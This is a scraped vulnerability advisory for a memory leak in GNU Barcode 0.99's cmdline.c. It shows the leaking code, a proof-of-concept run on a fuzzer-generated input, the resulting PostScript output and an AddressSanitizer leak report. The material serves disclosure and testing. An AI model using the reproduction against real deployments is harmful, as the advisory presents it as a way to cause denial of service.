扫码分享
验证:
体验盒子# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused due to an error in the 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.
cmdline.c:
128: int commandline(struct commandline *args, int argc, char **argv,
129: char *errorhead)
130: {
131: struct commandline *ptr;
132: char *getopt_desc = (char *)calloc(512, 1);
133: int desc_offset = 0;
134: int opt, retval;
135: char *value;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
%heightxpos yposwidth heightxpos yposwidth
[75.0011.0015.001.85][75.0013.5015.000.85]
[75.0016.5015.000.85][70.0021.5020.000.85]
[70.0027.0020.003.85][70.0030.5020.000.85]
[70.0032.5020.000.85][70.0035.5020.002.85]
[70.0040.0020.001.85][70.0043.5020.000.85]
[70.0048.5020.000.85][70.0051.0020.001.85]
[70.0054.5020.000.85][70.0057.5020.000.85]
[70.0062.0020.003.85][70.0065.5020.000.85]
[70.0068.5020.000.85][70.0071.0020.001.85]
[70.0076.5020.000.85][70.0080.0020.003.85]
[70.0084.5020.000.85][70.0087.5020.000.85]
[70.0091.0020.001.85][70.0096.5020.000.85]
[70.0098.5020.000.85][70.00 101.0020.001.85]
[70.00 104.5020.000.85][70.00 109.5020.000.85]
[70.00 113.0020.003.85][70.00 117.5020.000.85]
[70.00 120.5020.000.85][70.00 123.5020.002.85]
[70.00 128.0020.001.85][70.00 131.5020.000.85]
[70.00 137.0020.001.85][70.00 139.5020.000.85]
[70.00 142.5020.000.85][70.00 147.5020.000.85]
[70.00 151.0020.001.85][70.00 154.5020.002.85]
[70.00 158.5020.000.85][70.00 162.0020.001.85]
[70.00 164.5020.000.85][70.00 168.5020.002.85]
[70.00 172.0020.001.85][70.00 175.5020.000.85]
[70.00 179.5020.002.85][70.00 183.0020.001.85]
[70.00 186.5020.000.85][70.00 190.5020.002.85]
[70.00 194.0020.001.85][70.00 197.5020.000.85]
[70.00 201.5020.002.85][70.00 205.0020.001.85]
[70.00 209.0020.001.85][70.00 212.5020.000.85]
[70.00 215.5020.002.85][70.00 220.0020.001.85]
[70.00 223.5020.000.85][70.00 227.5020.002.85]
[70.00 230.5020.000.85][70.00 233.0020.001.85]
[70.00 237.5020.002.85][70.00 241.5020.000.85]
[70.00 245.0020.003.85][70.00 249.5020.000.85]
[70.00 252.5020.000.85][70.00 258.0020.001.85]
[70.00 260.5020.000.85][70.00 263.5020.000.85]
[70.00 267.0020.001.85][70.00 269.5020.000.85]
[70.00 275.5020.002.85][70.00 279.5020.000.85]
[70.00 283.0020.001.85][70.00 285.5020.000.85]
[70.00 289.5020.002.85][70.00 293.0020.001.85]
[70.00 297.0020.001.85][70.00 301.5020.002.85]
[70.00 304.5020.000.85][70.00 307.5020.000.85]
[70.00 310.0020.001.85][70.00 314.5020.002.85]
[70.00 318.5020.000.85][70.00 322.0020.003.85]
[70.00 326.5020.000.85][70.00 329.5020.000.85]
[70.00 332.5020.000.85][70.00 337.0020.003.85]
[70.00 340.5020.000.85][70.00 345.5020.000.85]
[70.00 348.0020.001.85][70.00 352.5020.002.85]
[70.00 356.5020.000.85][70.00 360.0020.001.85]
[70.00 362.5020.000.85][70.00 366.5020.002.85]
[70.00 370.0020.001.85][70.00 373.5020.000.85]
[70.00 377.5020.002.85][70.00 381.0020.001.85]
[70.00 384.5020.000.85][70.00 388.5020.002.85]
[70.00 392.0020.001.85][70.00 395.5020.000.85]
[70.00 399.5020.002.85][70.00 403.0020.001.85]
[70.00 406.5020.000.85][70.00 410.5020.002.85]
[70.00 414.0020.001.85][70.00 417.5020.000.85]
[70.00 421.5020.002.85][70.00 425.0020.001.85]
[70.00 428.5020.000.85][70.00 431.0020.001.85]
[70.00 435.5020.002.85][70.00 439.5020.000.85]
[70.00 445.0020.003.85][70.00 448.5020.000.85]
[70.00 450.5020.000.85][70.00 452.5020.000.85]
[70.00 457.0020.003.85][70.00 462.5020.002.85]
[70.00 466.5020.000.85][70.00 470.0020.001.85]
[70.00 472.5020.000.85][70.00 476.0020.001.85]
[70.00 481.5020.000.85][70.00 483.5020.000.85]
[70.00 486.5020.000.85][70.00 489.0020.001.85]
[70.00 496.0020.003.85][70.00 499.5020.000.85]
[70.00 502.5020.000.85][70.00 505.5020.000.85]
[70.00 511.0020.003.85][70.00 514.5020.000.85]
[70.00 516.5020.000.85][70.00 521.5020.000.85]
[70.00 524.0020.001.85][70.00 527.5020.000.85]
[70.00 530.0020.001.85][70.00 534.5020.002.85]
[70.00 538.5020.000.85][70.00 541.5020.000.85]
[70.00 546.0020.003.85][70.00 549.5020.000.85]
[70.00 552.0020.001.85][70.00 555.5020.000.85]
[70.00 560.5020.000.85][70.00 562.5020.000.85]
[70.00 567.0020.003.85][70.00 572.5020.002.85]
[70.00 576.5020.000.85][70.00 580.0020.001.85]
[70.00 582.5020.000.85][70.00 586.5020.002.85]
[70.00 591.0020.001.85][70.00 594.0020.001.85]
[70.00 598.5020.002.85][70.00 602.5020.000.85]
[70.00 605.5020.002.85][70.00 608.5020.000.85]
[70.00 612.0020.001.85][70.00 615.5020.000.85]
[70.00 620.0020.001.85][70.00 622.5020.000.85]
[75.00 627.0015.001.85][75.00 632.5015.002.85]
[75.00 635.5015.000.85][75.00 638.0015.001.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% charxpos ypos fontsize
[(o) 21.0010.00 12.00]
[(/) 32.0010.000.00]
[(c) 43.0010.000.00]
[(r) 54.0010.000.00]
[(a) 65.0010.000.00]
[(s) 76.0010.000.00]
[(h) 87.0010.000.00]
[(e) 98.0010.000.00]
[(s)109.0010.000.00]
[(/)120.0010.000.00]
[(i)131.0010.000.00]
[(d)142.0010.000.00]
[(:)153.0010.000.00]
[(0)164.0010.000.00]
[(0)175.0010.000.00]
[(0)186.0010.000.00]
[(0)197.0010.000.00]
[(3)208.0010.000.00]
[(4)219.0010.000.00]
[(,)230.0010.000.00]
[(s)241.0010.000.00]
[(i)252.0010.000.00]
[(g)263.0010.000.00]
[(:)274.0010.000.00]
[(0)285.0010.000.00]
[(6)296.0010.000.00]
[(,)307.0010.000.00]
[(s)318.0010.000.00]
[(r)329.0010.000.00]
[(c)340.0010.000.00]
[(:)351.0010.000.00]
[(0)362.0010.000.00]
[(0)373.0010.000.00]
[(0)384.0010.000.00]
[(0)395.0010.000.00]
[(0)406.0010.000.00]
[(0)417.0010.000.00]
[(,)428.0010.000.00]
[(o)439.0010.000.00]
[(p)450.0010.000.00]
[(:)461.0010.000.00]
[(h)472.0010.000.00]
[(a)483.0010.000.00]
[(v)494.0010.000.00]
[(o)505.0010.000.00]
[(c)516.0010.000.00]
[(,)527.0010.000.00]
[(r)538.0010.000.00]
[(e)549.0010.000.00]
[(p)560.0010.000.00]
[(:)571.0010.000.00]
[(1)582.0010.000.00]
[(2)593.0010.000.00]
[(8)604.0010.000.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
showpage
%%Trailer
==2183==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
Direct leak of 55 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
体验盒子
